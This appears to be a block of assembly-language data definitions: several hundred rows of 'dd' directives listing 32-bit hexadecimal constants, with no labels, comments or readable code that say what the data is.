dd 0DB313F69h, 8EA516A2h, 9C15A53Eh, 1492908Ah, 0F84D7F82h
dd 0CECAC817h, 0DB6EB05Ch, 25CBC99Eh, 47C5D3A8h, 0A9E91A84h
dd 27B405A0h, 0D762B1B5h, 84F825A3h, 738266E2h, 81AFC6F7h
dd 7F498DBAh, 0F80DB3BEh, 0E2207258h, 1533589Fh, 97AA8EF7h
dd 50EE9A7Fh, 0FB5D4184h, 0A36C7DFh, 97704DDDh, 0B2F3944Ah
dd 0BF96894Bh, 0BADDCE93h, 0D22A2DB1h, 0BE292A52h, 42524604h
dd 9517DA56h, 0DE1D8BE8h, 45E6F34Ch, 22970E43h, 0E54FAAEh
dd 3A41E1Dh, 0F3CCAB57h, 0E4710377h, 0C256CDA2h, 0FF315897h
dd 1FA6F44Ch, 92E33ECBh, 7CA1829Dh, 0FAB631F4h, 0BE423B2Dh
dd 81966D1h, 62E4FB68h, 21923958h, 0BDC68CDh, 0F0CABAF4h
dd 0E6D2FFD1h, 3AD2A9E5h, 0DF515F94h, 0D2DA59DEh, 0CEEDC036h
dd 12C73CFAh, 602589B2h, 5737A1B7h, 7B2F6BF3h, 4386987Fh
dd 4F8A94A9h, 0E04FC873h, 0CAE11A66h, 6A8AB951h, 9FD39F32h
dd 7B24ED60h, 0F66EF0D8h, 4BFEE2B5h, 6E0EC36h, 0FC39A592h
dd 5CF47C23h, 8B1B65A3h, 0BE7822D7h, 0D1DA6AE8h, 0D9ADECCFh
dd 0E9DDB44h, 0C9213D16h, 80F51684h, 9C5C6D37h, 0FF30215Bh
dd 53E7FB42h, 688BA72Bh, 63D21A8Ah, 9533AE32h, 0A4B36461h
dd 8E2FD065h, 0A7E257B5h, 5A0292ACh, 6CB90F6Eh, 318CB635h
dd 0E3BD3266h, 7F3F511Bh, 0B5071DFh, 0AC950EA7h, 5267C319h
dd 0C5D4EBCCh, 55C5B839h, 0CBF94C59h, 0BEAFEF3Dh, 5F836514h
dd 6D0D03D8h, 79E96CE4h, 55563E81h, 0F743E353h, 0E46F934Fh
dd 0A87EF6F3h, 0CB27653Eh, 0AA22567h, 5D9F18CCh, 3FFB8A5Eh
dd 0BCE97A49h, 7DE4F072h, 795A0A86h, 5668A1E0h, 8CE72A6Ch
dd 615FD5h, 0D9776C24h, 484B3F94h, 3E676B64h, 0A2C29DBDh
dd 0C481EFD1h, 0AABA552Eh, 0F04AA2D7h, 661DBCD2h, 0FE33EDE0h
dd 79E83594h, 0AB49DE42h, 0FF10D8B8h, 0BF256541h, 0E1B8B4DBh
dd 0BC4CAD9Fh, 3E114E10h, 0F0F915D5h, 1DF0B0ABh, 640984D9h
dd 0AED286C3h, 0FEAF76A9h, 9E3FC240h, 0B8EAA706h, 0FF743FB6h
dd 0CD836AE2h, 0F9D829Fh, 0EB427747h, 48A6D12Dh, 72B98B25h
dd 942D98F5h, 0C3BF7726h, 2CD0AD56h, 7D394317h, 0E0184159h
dd 0F38F7F1Bh, 125AD9B0h, 0B800DB83h, 54346C0Fh, 0D1AC14B8h
dd 990CBFBEh, 443AE172h, 0A6DA3E5Bh, 93F2CC3h, 0C89A74C5h
dd 209774A0h, 374B81E5h, 0EE7A5A3Eh, 7F4E92A5h, 8395F0F3h
dd 3677D785h, 0EAD65A7Ch, 0C5A63A6h, 73F532BFh, 5D0BB54Fh
dd 2EBA6C57h, 180ABA50h, 0CC885D4Ah, 0DFA6E176h, 0BA29E67Dh
dd 2CD29203h, 60EA25D4h, 89253622h, 0D6807042h, 0C4B97FCCh
dd 0EEEDBA74h, 0F69369CFh, 0B7B44865h, 99550FABh, 0B0529AE8h
dd 0BA867195h, 6E42295Ah, 7C834A6Dh, 44220170h, 485D5379h
dd 0A28B8CF8h, 0CBEB3885h, 7414C191h, 0AC264FA2h, 66A2AE4Ah
dd 0F4239DA3h, 5775DDCFh, 0B2AB794Dh, 0A41E496Fh, 9B6DFDA0h
dd 0C65722Dh, 8E786878h, 0DE0A21Fh, 0F7A5544Ch, 940DCEBh
dd 3D42DCB2h, 2ACB7897h, 0C2BFD4B1h, 0C1206F40h, 4C8E1CF1h
dd 5A3F7D75h, 0CEDDD6CFh, 5FC33E3Fh, 0F8F9BB88h, 26C92D66h
dd 70250185h, 5A4E9F4h, 8FF0D01Ch, 0AA5B51F5h, 19625670h
dd 3A0B8FBCh, 0CC2C513Ah, 0C4CD4623h, 0DACC7CC8h, 0D2D16EDAh
dd 28EF944Dh, 0D05DC1AFh, 9383A589h, 63EE4ADFh, 97DEEE56h
dd 0B81C12ACh, 2AE5AD13h, 0D88B4AAEh, 4226A3DBh, 0AF21A7Bh
dd 0E8EE1ADDh, 498F397Eh, 0AF4E49Dh, 0A39039C9h, 5789657Fh
dd 0BED67C39h, 5C782B6Fh, 870E6CE3h, 2F197E2Bh, 50B907CCh
dd 0F5B9BD2Bh, 742D634Eh, 883B981Bh, 3E4C935Eh, 507D1CE5h
dd 7BADD6EAh, 364CA059h, 0FD5CA353h, 189F8394h, 922A725Ch
dd 0E1F48DC4h, 3AA7EB9Bh, 0F8F87529h, 0BE809FC0h, 451DF2DFh
dd 0E7CDF0A7h, 51DF8820h, 5759188Dh, 2AF71F9Ch, 3EF90A22h
dd 60BF1678h, 8785DE3Eh, 467FE33Dh, 4D1BED81h, 38F57677h
dd 0C6864EEEh, 0EEDA227h, 717FF5ABh, 607BFD04h, 25EEF908h
dd 0B95599BFh, 3031374h, 27C3CB09h, 0DA60D141h, 9D15DE4Ah
dd 82EB9D6Dh, 0F2D105BBh, 0C7396AC6h, 649734F2h, 5E238A7Ah
dd 3734BFB8h, 668BADA1h, 5636805Bh, 4685B394h, 0CCBAB0FCh
dd 595C8D1Ch, 0F4173497h, 0CA2142C2h, 6FDF3B1Bh, 0C6703F9Fh
dd 832A838Dh, 74D63140h, 829F2CB1h, 0D27F89BFh, 638D6D06h
dd 0F2FE8C0Fh, 0F3FD449Dh, 971AE5B3h, 0A31203BCh, 89A96D3Dh
dd 0CAE1BA12h, 0CBBDFC42h, 95A5D584h, 0DFB445C0h, 95A27E68h
dd 0AF21A678h, 76604A96h, 868ED60Dh, 8469158h, 7E2C5DF9h
dd 67CBFEBFh, 59DB5377h, 0D526026Ch, 6BB76C33h, 955AF5D2h
dd 0C65763ACh, 0CFDB2574h, 0A36902DDh, 5FDD3087h, 975F77D1h
dd 0DE3B04C3h, 27AF8134h, 62D8D5B1h, 75F00565h, 5B67C5DBh
dd 0EF0DFC37h, 32B26D52h, 2B7F69C0h, 0B897AD41h, 408F2318h
dd 830318C4h, 0EF9FFD9Ch, 93BF7D28h, 0CB79C011h, 3E2930BFh
dd 5E3F9335h, 0FE1CA531h, 0A50ABEFEh, 1B89A28Fh, 0EFC7DBDAh
dd 17AE66FEh, 6D1A0309h, 671E3DA7h, 52A5FFEAh, 0B7E306F9h
dd 6A958475h, 951DB145h, 38343DEBh, 0DB60E5F1h, 3EC077F7h
dd 53A87568h, 0F2FFE255h, 36E98CBFh, 411250ECh, 2D963814h
dd 958BA48h, 0E6D5F421h, 2D356C8Ah, 8EDF5A7Ah, 0B6FFE982h
dd 0B8B75711h, 84715D78h, 0F393CFDEh, 6B45303Dh, 423C12BFh
dd 0AFB2DEE1h, 0CC45D661h, 87EDF0E6h, 0F364175Dh, 564945B4h
dd 0C747E795h, 251A0BE7h, 7E437E68h, 3EC1A38h, 0D088D48Ch
dd 253CBB95h, 0AB7FC7C4h, 0BB7556FEh, 3191F7D5h, 0A0946E4Bh
dd 2D13E557h, 0F9CAECDEh, 7DA3DE2Dh, 0ABCAD2E9h, 94477D04h
dd 0CE20BB1Fh, 94B21810h, 2F8AEDEAh, 184494DDh, 0A5B49D11h
dd 29D6FE92h, 0FD15EC18h, 2304D458h, 0A232E80Eh, 0A4A2D9Fh
dd 0F1EB483Ah, 0FD3A236Eh, 0A1F84A81h, 9D4DDEABh, 6DF99B88h
dd 9211A282h, 0C1F98E2Ah, 142933E8h, 99130C4Dh, 0FBC527D5h
dd 2B24C770h, 6237E94Dh, 0C4584CFh, 8312C001h, 0C0F3159Dh
dd 0F556BF99h, 49EC88D2h, 0F8600A92h, 54AAC0F1h, 2C6C914Ch
dd 6FA90633h, 0C537E95Dh, 5F5F9DA9h, 514E144Dh, 0F4303A37h
dd 82B753A9h, 55204096h, 0D2D8B771h, 0C72596C3h, 0D5C4E9EAh
dd 9456A623h, 34F17FBEh, 5504AE6Ah, 0BB055790h, 0CD8EC761h
dd 67F184Fh, 0AF6023E3h, 7B5489A4h, 87557A13h, 657066FFh
dd 20D84C8Ah, 0A6B9E04Ch, 3A365843h, 65FC99BCh, 9D4ECFA2h
dd 1B16AC2h, 17FA1C3Fh, 466D508Ch, 84E7376Bh, 650F5D95h
dd 1092BED4h, 2AC3A0B4h, 0EE4B7C0Fh, 998FA6CAh, 0A568F171h
dd 0E6CF3F22h, 88BE273Fh, 0F12F1E17h, 4C77CEA1h, 0D566E2A7h
dd 2813EE35h, 0FF0A40F4h, 21C091CCh, 3ECEEDA1h, 0B83DD981h
dd 6CBF9278h, 189C6F3Fh, 0F0A8AB1Fh, 0CD95CE0Bh, 4EBD5A8Dh
dd 0FA14789Bh, 610F7D56h
dd 52AFC4C1h, 625FBC33h, 4B8792DEh, 0E8BE5DA5h, 0A92FE357h
dd 25A3E8E8h, 0CF19ED58h, 0CF947F98h, 0F77956DAh, 0AD4D46ADh
dd 701638B8h, 2FA3D2ACh, 0A721D675h, 44CF3A8Eh, 0EFAAB3CDh
dd 4B9321EFh, 0E3AF9C90h, 30693EAAh, 8AAB65F8h, 4A3A54C0h
dd 0A5332FB7h, 7C2BC889h, 470AC581h, 5E49D56Bh, 59D6D995h
dd 4BA02DA4h, 69E31F32h, 119C537Bh, 0E51529A5h, 485C8CABh
dd 2D2DDA7Dh, 8DA25160h, 9CE1504Ah, 0B3F46961h, 4327188Eh
dd 418C7CD3h, 0BB70C679h, 7AD13E9Dh, 0F9D895E9h, 0B70A2AD3h
dd 8CC2CCBFh, 86F994AFh, 6C901ABAh, 7B0527C9h, 795C047h
dd 547140C2h, 2204956Ch, 71C8ACCBh, 4CA00735h, 21D73B6Eh
dd 9A728663h, 4FA6666h, 0F7CEEA45h, 493E3303h, 0CE8DD9A1h
dd 5097AF03h, 5A53E1F7h, 63B2F4DEh, 0DB6832B4h, 0EDCB3D6Bh
dd 0DEA252Eh, 3995BA04h, 8E44AC0Bh, 1EF4F18Dh, 175EFA18h
dd 0E77E6E9Dh, 9CAB292Ah, 0D3AB1F86h, 736DACEBh, 416CB0E8h
dd 274A31DFh, 9EA6073Ah, 1B228AF6h, 33C90E31h, 0A7B4EA4Dh
dd 53071D23h, 2EA3F8CFh, 0D92FCD6Dh, 0F230E417h, 0DC8AF199h
dd 234AE40Eh, 8B4CEAC2h, 8124E676h, 0ECD0A944h, 0A617E5h
dd 1CAF575Ah, 0B56EDCCEh, 72FDBAB3h, 8F07B0BDh, 2DAC5648h
dd 0DA76EBBFh, 0E3E2A8F8h, 84C9BD6Dh, 0E079F42Fh, 14BA1BC5h
dd 0F18F1ABCh, 9E63A25Fh, 4A1FC546h, 2AA928DDh, 138C89EFh
dd 0E28F16A7h, 0F94ECA61h, 246B5634h, 0C2D50F0Ah, 0B3D5F532h
dd 183D8B3Dh, 0EFFC43FEh, 7996A359h, 0AE682E95h, 95E4809Bh
dd 0D2BF6BBBh, 7E0FCCADh, 4BB57428h, 3A35F4EDh, 0FA63B82Fh
dd 53957390h, 5BBA25EDh, 0A23B671h, 0A215EBE9h, 0B4E41935h
dd 0DCCE6ACAh, 824F9C4Bh, 20E1890Bh, 3DB655E3h, 2BADD9A6h
dd 0BE5D9742h, 1EBF3344h, 0CE0FE572h, 6420337Dh, 0B09EEF36h
dd 227271D5h, 903FF87Eh, 52ABB879h, 0E4C2DE1Eh, 0FCDBA4B2h
dd 0AFF1F638h, 0A0EA815Ah, 5B7FFA59h, 62AA99F3h, 0F53C4059h
dd 1CA7236Bh, 0E6EF1F14h, 0F3641E3Ch, 0DC7E16C0h, 8D5FDEF5h
dd 2D8AA4Fh, 0DD8A60AAh, 1FCAAD1Dh, 1C450313h, 0A529A91Fh
dd 84B53BBAh, 0FCECF42Dh, 6AE8FA67h, 509F1EB4h, 0B8F46EF2h
dd 95FE950Bh, 675E8110h, 0FA06C4A7h, 4D286D8Ch, 0EB71FAFFh
dd 0F8A5471h, 5AC598B4h, 1A7AA9C6h, 0BF86D8B6h, 0BE884B3Eh
dd 7340125Dh, 0FAFBC96Ch, 0F78B33FDh, 4B827E9Eh, 0A48CD4h
dd 0CE56D4A6h, 0CDAC9758h, 444178D5h, 4FDFF7D2h, 0D31173AFh
dd 0DDE03990h, 1505B58Ah, 0A5176BBCh, 1B69563h, 0B45C52C2h
dd 0A52E960h, 3D887217h, 0CCDE9BA1h, 7C0F6A3Ah, 1D2815F9h
dd 4A2B5E06h, 3BF0AEB2h, 0E308322Eh, 442E68CFh, 5F10D56Bh
dd 0B542A180h, 41923DDh, 173FA4FCh, 3C1ECFBFh, 6EC2A3F6h
dd 0D99844ACh, 0FE5DC27Ch, 5EC436C5h, 3B9BFDCCh, 501C5F85h
dd 55E47A2Bh, 1A6FACBDh, 1F8F7A51h, 0A026D47Eh, 0B57EB53Ah
dd 4EAA7271h, 235094CDh, 721FB7DAh, 0C0DFDFBEh, 37BE8DECh
dd 0E33D855h, 0DD028F4Dh, 33F7D0A8h, 83C82333h, 957B6054h
dd 941D12A5h, 104D318Ch, 0F3B08778h, 7935562Dh, 0D665202Ch
dd 0F9D536C4h, 86CFA7E0h, 0A9956624h, 75FD98FFh, 0A2D4DC5Fh
dd 20B59C04h, 0E4D19DF2h, 22653670h, 0B93E579Bh, 0B653BDABh
dd 0E9C36288h, 95B8258Fh, 7EB11FEEh, 7A971C22h, 0B70457E1h
dd 794E879h, 0A23CEAD6h, 6799F958h, 9DF3D3Fh, 794A54CCh
dd 0F5EA834Ah, 47616EC6h, 6BFDBC3Bh, 2077703h, 3C9C94AAh
dd 91C4CBA5h, 99EDB677h, 0B3849E64h, 123EDABCh, 0A2A85567h
dd 8B15EB2Bh, 0F072869Ah, 0DA6DC31Eh, 7E647928h, 0F806D97Fh
dd 0F6CDAEFEh, 0B83815CCh, 0BA5450FAh, 0BD55F39Eh, 0E7D186FFh
dd 99F8078Bh, 6431EEC8h, 0C35B0D4Ah, 0FDF849F2h, 99221C88h
dd 16AAE776h, 9956CF20h, 0BC3D1F3h, 0B388150Ah, 9AEC98C5h
dd 0D1877AEh, 795052B7h, 0CBDF8470h, 0E87E7038h, 1726761Bh
dd 0C2950067h, 697E7486h, 8EF95193h, 8C41CA1Fh, 8B712954h
dd 0C1748C95h, 48D7F529h, 0D1B7D831h, 8AA21CD3h, 9E667B21h
dd 0A39128D6h, 30BF07B1h, 0B1E8757Eh, 16C7F192h, 0ED44263Fh
dd 31DCB927h, 14AB4F5Ah, 2A700522h, 7C87F44Eh, 0D57F35F1h
dd 6F39EE07h, 3EC693D0h, 864F7124h, 0E1F4BF30h, 6F5C8CE2h
dd 0BD0B5A0Eh, 38329313h, 5791521Dh, 0AAB339D4h, 4B4708C4h
dd 0AACC5135h, 82AE1CF1h, 22A0DA1Fh, 0A7E5982h, 2919CD49h
dd 74BDBE52h, 0DA40B47Bh, 7CB86E3Bh, 0CD47A348h, 9CAB7ACEh
dd 0A1F43838h, 0C4651DBDh, 0A4F89D8Ah, 73BB7D9Bh, 0BDC121FBh
dd 3DCCAB6Fh, 756C6388h, 12B4B445h, 0AFCFB3B4h, 0ED24C581h
dd 0CE5B7D24h, 839D15FBh, 0A28BD65Fh, 51B8AB6Ah, 0B776F5FFh
dd 0C0F34C47h, 837975Eh, 198AB59Dh, 5403F0BFh, 4EFF53FBh
dd 3CBE09B6h, 0F069B464h, 3F9C499h, 7D5ADE67h, 0C841D2CDh
dd 7E53E0A5h, 0BDC22A67h, 929EB2B7h, 0D7A3BF17h, 4B70E31Fh
dd 5CD273EEh, 2D506909h, 0F438AB45h, 0DA5BF947h, 589B203Dh
dd 5F34703Eh, 0B8736683h, 7F1A7BDCh, 81BC1DC3h, 70852299h
dd 9F35C362h, 3E96F95Ah, 9F9AE418h, 8E3F0C13h, 10DE7532h
dd 0E93E83B6h, 1C98C90Bh, 6952D94Ch, 2AAACB4Ah, 0FC7EFDD9h
dd 95827619h, 19174CD0h, 0BD224473h, 0D56A9CBDh, 2EA848Ah
dd 0DC0ED235h, 0C3B4E1A1h, 8B3685Bh, 3A520059h, 0A27CAE8Ah
dd 0ABCA3F0Bh, 0D99450B5h, 180C68E8h, 0BE6AE99Bh, 0F3B35294h
dd 7B32E939h, 24C6AC79h, 44DD0A33h, 344E9B07h, 49602963h
dd 53C5C6CEh, 16D5AF21h, 0D3F1F76Dh, 0EEE5F664h, 0C5FE0CDCh
dd 68595C90h, 4F52FB72h, 0C68F6FFCh, 499B152Dh, 6C727ACBh
dd 9556964Dh, 0E126B3B5h, 7658FDD1h, 6D8D3995h, 7F46AEAEh
dd 0F878A335h, 5E39936Ch, 63A21E3Eh, 0F359F07Fh, 5A71B457h
dd 0BF959785h, 83D48B92h, 8AB411CAh, 201C6D1Ah, 0D6BBDA1Ah
dd 0E9D618F5h, 0B8C182Fh, 5D2ACEE9h, 621F85B7h, 0BF8B14FFh
dd 0ACDB8592h, 83EC6F75h, 5EF39824h, 0C767F02Fh, 72BFD68Bh
dd 283D3576h, 8BBC3450h, 4BEF18ECh, 866ECEB3h, 5D8B381Eh
dd 0D75557FCh, 18662AFh, 0D1A6223h, 0FA38C6F6h, 7DD8F7Dh
dd 39C7B9DFh, 0C3AE0A5Eh, 735F6138h, 0CAEF17F7h, 0CA0068DFh
dd 0A3AC7D65h, 2B06D64Ch, 0ECBBB99Eh, 0EEA54EFh, 5F0D1B04h
dd 7E63B86Ah, 8A187A18h, 0CD856507h, 0A02D1011h, 4BB9AF72h
dd 0D784EFDh, 0DD6F83DDh, 87251A92h, 0BD62A77Dh, 15231B0Eh
dd 67AA3477h, 0F1E28489h, 68A0DDA9h, 0DFEDD0C4h, 2DF2C796h
dd 0FFB5396h, 0ACA4CB5Ah, 8F54B8C6h, 0E98F23Eh, 0D1E0C796h
dd 4FB2EE2Ch, 6867B4ADh, 0CA171D71h, 99F3F0D7h, 1D6EA1B9h
dd 788598C8h, 18E4E6FFh, 71A0F935h, 2EC45F48h, 0C51F500Fh
dd 0FF687115h, 8733EAE6h, 99645D1Ch, 0B9D0DED3h, 6FD70FDFh
dd 0ED856234h, 0E7C70D41h, 0D0962643h, 0A55590AEh, 92D93E13h
dd 0C2E9DC38h, 6C3A455Fh, 0C2B569CDh, 38A6E16Ch, 83E79B03h
dd 39E4D682h, 9CDDA605h, 7E053162h, 8769E4A2h, 7F31E6FEh
dd 0D6C51D52h, 4C99957Ah, 35F057EBh, 7C99F49Fh, 86E2177Eh
dd 2B0FDB4Eh, 24817D38h, 2587C6F8h, 0B4B6B756h, 0B3571FE9h
dd 0D810D124h, 0CD642ECDh, 7315B663h, 0E87F678Fh, 0DAD2CF7Ch
dd 38EFF635h, 0BB09FD36h, 0E2BE57F5h, 8D070FC0h, 65812B94h
dd 0DA8DABDBh, 9AD12BD4h
dd 0AEA5E2AEh, 0E81C7AB7h, 6B036B65h, 0E46C1E34h, 0B908EEBAh
dd 23A53A36h, 8D883DBCh, 0BA8AC0C3h, 0F8A06E23h, 1DBFD481h
dd 630BE50Bh, 9492C5E2h, 0B7DACB87h, 6E75ED14h, 64A25FA3h
dd 248D3659h, 709E7306h, 0B034E19h, 47386955h, 6109F2EDh
dd 2D6A9A46h, 24119DC7h, 8DD65AC2h, 46D92B14h, 0F7E651AFh
dd 1B018F52h, 4A8D99FEh, 8806237h, 93ABA321h, 3F79F199h
dd 0C3E3DA1Eh, 5A97D52Fh, 0C7E7188Bh, 7FCE657Ch, 8556F73Eh
dd 0B6AD0A37h, 0A66AEAECh, 0CC7E5954h, 25E3E958h, 0B4AD923Bh
dd 0FF0B580Ah, 9C6C5A2h, 80CEC4E5h, 3F364C1Bh, 0FE8819EEh
dd 5B61FE05h, 0BBB3C872h, 2A3DF889h, 0AA11BEDAh, 92BC62B6h
dd 689EF6B4h, 0AF6713C6h, 5B076F2h, 0A072511Ah, 485C6BE5h
dd 9CEDD542h, 0E98AB09Bh, 45B521D7h, 0E33DF49Ch, 0ABEE2A84h
dd 68BE35Fh, 0E5F807CDh, 4690EABEh, 2B32D6ECh, 8129C3DFh
dd 69D5F63Ah, 788A800Dh, 0F1E5DDEBh, 35CC738h, 4294F4A4h
dd 0BCD83B1Ch, 368D5FC3h, 0B2E45DA2h, 14B26FF5h, 0A548CC59h
dd 6CA5E9ADh, 0BBB57199h, 0A8C199A4h, 7A3F07E1h, 59E09889h
dd 47220B8Ah, 0F05554B1h, 798C54F1h, 4D72A702h, 4522F531h
dd 0BC9AD745h, 0F1D5BBA7h, 0F4C02EC6h, 890DE66Ah, 85E15B43h
dd 5050CCABh, 27B4AA32h, 70A874F3h, 3D8B9289h, 0D23F4D9h
dd 0DC4A772Ch, 0C0F18E51h, 0DD93FBA6h, 2845F47Fh, 0C5E04063h
dd 9AFF06D1h, 0F0E99D89h, 0FD76D3E6h, 24C8AA91h, 0AB91753Ah
dd 7CEC69D1h, 0B29054Bh, 1195C6F1h, 0D3B903FFh, 1012BA2h
dd 0E157B4B1h, 0D2F37C15h, 0AA91254h, 47DCDF72h, 0E5AB17F7h
dd 0D307EA74h, 0DA2E2245h, 8AB697ABh, 8C623D69h, 6B537F66h
dd 0AD5C6FA4h, 36E33E44h, 88F36ECFh, 5F4003DBh, 1FC76170h
dd 0D982CCC6h, 0A887609Dh, 0DE513707h, 0B14CE03Eh, 0B8ABB4FBh
dd 94C37BB6h, 0E1EB4DC1h, 2F2AFB21h, 0DB8E1962h, 0FB45A386h
dd 1F8C8607h, 0AA3E97D4h, 0A0ED44D3h, 0D8AE8984h, 15E4567Ah
dd 32BE07A1h, 71C46DAFh, 437D13F8h, 891FBD9Ch, 80C2D635h
dd 652033B7h, 0EA3EBEDDh, 0B04D6290h, 0F81F2383h, 348F77E7h
dd 0CBAAD142h, 3E255816h, 2B8DEEFDh, 95ECD633h, 8E3933C1h
dd 3B44E2A4h, 0F52FFA1Ch, 9781F15Ch, 7D59EFFAh, 2DDBF95Eh
dd 7787BB76h, 0AF1579A8h, 3C37603Ch, 0B43AE7AFh, 734AADF5h
dd 0A912BB6Ch, 1FD094C8h, 5332C6D5h, 4D0582B6h, 8A05BBC8h
dd 3B6D7783h, 0EF45A9ADh, 0BE2C492Fh, 0A50CF2CAh, 0D9238128h
dd 1925FF4Ah, 89BCB764h, 0D58725FDh, 30C450Bh, 14FD05CCh
dd 9D1685E7h, 3BE3D952h, 0F8692E6Dh, 0B0A757A1h, 0AB462F9h
dd 2A404298h, 7E3B35B4h, 3A88A58Bh, 3F2B136h, 3733D77Eh
dd 0EAF8F6F7h, 4914F041h, 0F55514B2h, 897BA781h, 0BA2F66B9h
dd 43B9A7B3h, 0BA15D18Ch, 5F2370Fh, 0F653A313h, 81F061D4h
dd 0EC74FBE2h, 0E422780Fh, 1F6B1EC7h, 119287F3h, 9C2652C5h
dd 0A7397DA7h, 8ACC5188h, 524ADF03h, 567ACAA0h, 976F6A70h
dd 98485640h, 0D393AD8Bh, 633EFFACh, 7BFABBDCh, 0B14007BAh
dd 42E7D88Ch, 0B9826668h, 0C48484E3h, 34B33A5h, 0DCA9625Fh
dd 8B0F97Fh, 225EE70Fh, 0C4B44A2Ch, 0ED8A054Ch, 79CE2A3Ch
dd 6BFAB770h, 387F8985h, 40D5E2E6h, 0AED1C3EAh, 2BA62700h
dd 0CCB2687Ah, 57610878h, 0C8AA27D8h, 0CDFEFEE6h, 6E72AC8h
dd 0D05DF5CEh, 0C4E16B8h, 86071685h, 35621618h, 7EC2D6E0h
dd 0A32EE07Fh, 0C0F3EA35h, 0FF5B49B1h, 9F55F893h, 0D0994287h
dd 919F09B1h, 9C6CEE20h, 576316FDh, 0E4A16364h, 8D23E839h
dd 0EFB59952h, 4D7F5F1Ah, 62788A12h, 0EDED3B0Fh, 9698F75Eh
dd 0EA606C46h, 56FFCFDBh, 0E540A901h, 0AAAD0B0Fh, 0D240058Ah
dd 4ED18C76h, 6B380971h, 6AD7CC61h, 0D845F6FCh, 2FE63BA3h
dd 3E8D6A88h, 5A350E8Bh, 7C9BE18Fh, 5BC01717h, 44E2D203h
dd 0FCBEF8E5h, 4B40B9F2h, 0B15D14BBh, 461E030Dh, 847E4585h
dd 0BF58CA09h, 51409820h, 0DA8B5F27h, 9D5F7698h, 383B1886h
dd 78D4317h, 0FBD56CCEh, 0D3275195h, 0AFBF6ABh, 131E3933h
dd 0D62F1BEh, 0C991D4B4h, 20F71147h, 17F428EAh, 0E810E15Fh
dd 0BB6287EDh, 9F876A93h, 0C75F16B3h, 0CBB32F6Bh, 5D9BF3F1h
dd 759AE9D4h, 2BE5452Dh, 0F42686DBh, 4E02DACEh, 0F0C72BA6h
dd 9B3E8F46h, 5A35D1BFh, 76788F7Ah, 237D93B9h, 0B2307E61h
dd 361E2BB1h, 857651F5h, 8770317Fh, 9765EF40h, 273A7911h
dd 0C5794599h, 50AB7A3Fh, 4DFF5FAAh, 27DFE6FFh, 20C42D1Fh
dd 715696E6h, 0B178B98Dh, 4C16B8DAh, 0AF60968Eh, 2B9F61BBh
dd 5FED7CD0h, 5DF68B98h, 157DA6E8h, 88A36C67h, 1CFE07B7h
dd 0ABF2F95Ah, 8FA3F4D0h, 6BA9A298h, 75152099h, 2AD7CE79h
dd 7DEB7411h, 0CA19DAD1h, 0A520F266h, 0A6D3463Eh, 93FD9F2Bh
dd 18CD59E9h, 0CD702B3h, 618A2D5Eh, 769A1EDAh, 0F8227289h
dd 0A0C4E3E1h, 0E53B6E39h, 28566464h, 8D69C95Bh, 70258D9Ch
dd 0C1F3653Ah, 0A7776884h, 9FFD1301h, 768D8187h, 9BE7D659h
dd 2ABFCA27h, 105EDE7Ch, 2577C30Fh, 0D9816D4Ch, 96B6D4D7h
dd 0BA15B265h, 4F338B52h, 1DED5744h, 9158919Ah, 690E97FCh
dd 5F768AC9h, 182C68Bh, 0F7782F8Ch, 457846A4h, 0BBA7756Bh
dd 0AE9FD606h, 0E6FAF87Dh, 0BBDF2DE3h, 0BD8245B0h, 0DA0733ADh
dd 0E607DD88h, 0FA9A2F3Ch, 0B33FB35Fh, 0D0FC8A77h, 8FA728BCh
dd 5F3BED50h, 82FC3869h, 0AD0603EEh, 734E6C06h, 53F75D58h
dd 6F63E701h, 8FE89773h, 0E173EE5h, 0EEBFE2BFh, 34BAA0BFh
dd 38EF105Fh, 4BB01734h, 0FE8CCA89h, 0F969AAB2h, 0C6526F1Ah
dd 28FD85FCh, 424CA558h, 7EC0BB75h, 3A1B7AD1h, 0B710FB5Dh
dd 0A47B484Bh, 4B442FEAh, 0A480F1B8h, 42B05FCCh, 8A6F98F8h
dd 0EFD6A496h, 1095D474h, 77AE65F0h, 6E74D9Eh, 0C92EFC66h
dd 3335F61Eh, 7B191E04h, 6B28186Ch, 5874E66Bh, 52E4D6AEh
dd 7376F45h, 0BD71A0BCh, 489B631Eh, 5B670FE4h, 4CB1E791h
dd 0C4EDB065h, 2B1F3E24h, 897C603Ah, 0B87E5963h, 29BD6FD8h
dd 0AA4F6417h, 8F0325D0h, 0B06C8769h, 57D777DBh, 10E58572h
dd 0B355AA79h, 278EE472h, 515E99EBh, 0B59E5490h, 0AF64A64Ah
dd 0D72D1F8Dh, 932CC56Fh, 35A5741Fh, 0B0AEEF61h, 0CA52BE8Ah
dd 0D0787F87h, 0FC4FA324h, 0C0968C18h, 2526819Bh, 0EF0CF8E0h
dd 4BFFB74h, 0B4052CDFh, 0CBAAEA08h, 6E175C2Ah, 0A1B109C0h
dd 0BB64E061h, 866F219Ch, 7C87FCD0h, 0DF23F351h, 0C71CE275h
dd 0BE9D0330h, 4455735Eh, 458AC9E0h, 0A5B4725Ch, 0F20CEA55h
dd 9C36F28h, 0B8220BD1h, 0AF5ACEF4h, 855FE154h, 6BD234ECh
dd 0BCAE0833h, 56ADAB98h, 0CB928F13h, 68FA68D7h, 0DF07A4A7h
dd 5627123Fh, 0F72694BEh, 0F3C494E2h, 56484141h, 509D7DD0h
dd 7FA74BDh, 30D1433Dh, 478D7147h, 6892D8FEh, 32244942h
dd 683F7DBBh, 7B8F3E91h, 0A422AED1h, 87E2A812h, 0B0F0ADC3h
dd 2CB3291Ch, 245B776Dh, 3F09ABF9h, 0CA414D2Ch, 36743157h
dd 7FF737B8h, 445A4F27h, 6568BF56h, 163E993h, 1B1FE6E1h
dd 0B31032B8h, 67FE5B2Ch, 4E57F023h, 0BA6ECB47h, 0A7B2F82Ah
dd 81D2B4CDh, 0CF44F52Dh, 17DBAD1Ch, 62C6530Fh, 12CD2E7Bh
dd 3D521DD4h, 859B3D2Eh, 59694625h, 3DE1FF8h, 786613EBh
dd 0DDEDAA34h, 15FB7F12h, 0B35C6A47h, 0FB442A95h, 7D79373Bh
dd 4183D609h, 0E04A979Fh
dd 957B4735h, 0CC3874DAh, 303F8E97h, 0F2A7EB7Ch, 28A6195Dh
dd 1F96CE66h, 0CB10C13Ch, 0FC886F8Ah, 91C08633h, 45BA5AA9h
dd 19CBF02Eh, 5762466Ah, 981F46C7h, 3B65E7B7h, 0CCBD97C6h
dd 230EFF10h, 26A09DF6h, 77F11D36h, 0B4B6916Dh, 71AFB538h
dd 2574DA39h, 0EE49D750h, 0FFF457Eh, 8C9EA69Bh, 0CEA1D5AFh
dd 8B4877EAh, 6DED4DA4h, 39C8CC43h, 96250B4Ch, 0ABE0576Eh
